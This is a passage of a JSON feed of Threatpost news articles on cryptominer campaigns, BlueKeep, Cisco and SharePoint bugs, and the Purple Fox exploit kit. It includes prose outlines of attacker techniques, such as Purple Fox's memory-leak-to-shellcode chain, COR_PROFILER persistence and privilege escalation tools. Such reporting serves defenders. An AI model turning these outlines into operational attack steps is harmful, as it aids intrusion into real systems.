day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "modified": "2019-06-20T19:53:23", "published": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "modified": "2020-05-07T21:01:37", "published": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "modified": "2019-06-05T14:14:47", "published": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1491"], "description": "UPDATE\n\nMicrosoft has added a fresh CVE to its security portal, linking it to the existing November security updates (the patch itself was already included in the updates, but not specifically named). The CVE describes a vulnerability in SharePoint Server.\n\nAccording to a Microsoft Security Advisory, an attacker could exploit the bug (CVE-2019-1491) to obtain sensitive information and then use that information to mount further attacks.\n\n\u201cAn information disclosure vulnerability exists in SharePoint Server. An attacker who exploited this vulnerability could read arbitrary files on the server,\u201d according to [the advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1491>), published on Tuesday. \u201cTo exploit the vulnerability, an attacker would need to send a specially crafted request to a susceptible SharePoint Server instance.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe reading pane is not an attack vector, the computing giant added.\n\nThe patch addresses the important-severity vulnerability by changing how affected APIs process requests. Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 SP2 and 2013 SP1 and Microsoft SharePoint Server 2019 are impacted; Saif ElSherei of Microsoft Research Center\u2019s Vulnerabilities and Mitigations Team is credited with discovering the bug.\n\nThe CVE has been added to the computing giant\u2019s existing stash of Patch Tuesday security updates.\n\n[December\u2019s Patch Tuesday](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) was relatively light, and it delivered just 37 CVEs (including the new one) across a range of products. The scheduled security update this month in all now includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business; it addressed seven bugs that are rated critical, 29 that are rated important (including the new bug), and one rated moderate in severity.\n\nOne of the updates is a fix for a bug that was first seen being exploited in the wild as a zero-day. [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k; the exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n**_This post was updated at 10:50 a.m. ET on Dec. 19 to correct the statement that this was an \u201cout-of-band\u201d security patch. CISA/US-CERT mistakenly issued an alert using that language, leading to confusion on the part of this reporter and many others. We apologize for the error. _**\n", "modified": "2019-12-18T19:14:55", "published": "2019-12-18T19:14:55", "id": "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "href": "https://threatpost.com/microsoft-issues-out-of-band-update-sharepoint-bug/151260/", "type": "threatpost", "title": "Microsoft Issues Out-of-Band Update for SharePoint Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "bulletinFamily": "info", "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "description": "A high-severity bug has been found that allows remote attackers to hijack Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOne Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&amp;P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n\n**_Ransomware is on the rise: _****_[Don\u2019t miss our free Threatpost webinar ](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)_****_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost_****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-06T17:43:57", "published": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. The flaw was later [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>)as part of the February 2020 Patch Tuesday release. Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium)](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. \u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:50:38", "bulletinFamily": "info", "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466"], "description": "Google has lifted the curtain on its latest version of Chrome, which the tech giant has pledged touts more data privacy features, as well as fixes for high-priority vulnerabilities.\n\nThe release comes after Google had promised updates in Chrome 70 to \u201cbetter communicate our changes and offer more control over the experience.\u201d\n\nChrome 70 for Windows, Mac and Linux will roll out over the coming days and weeks, Google said in a Tuesday [posting](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>).\n\n## New Privacy Feature\n\nMost notably, Chrome 70 includes a panel enabling users to have more control over how the browser behaves when they log into their Google accounts.\n\nThe pressure is on Google to prioritize privacy policies after the tech giant came under fire for a change in Chrome 69, launched [earlier in September](<https://threatpost.com/google-rolls-out-40-fixes-with-chrome-69/137210/>). After that release, an update to the browser\u2019s sign-in mechanism [automatically signed users into 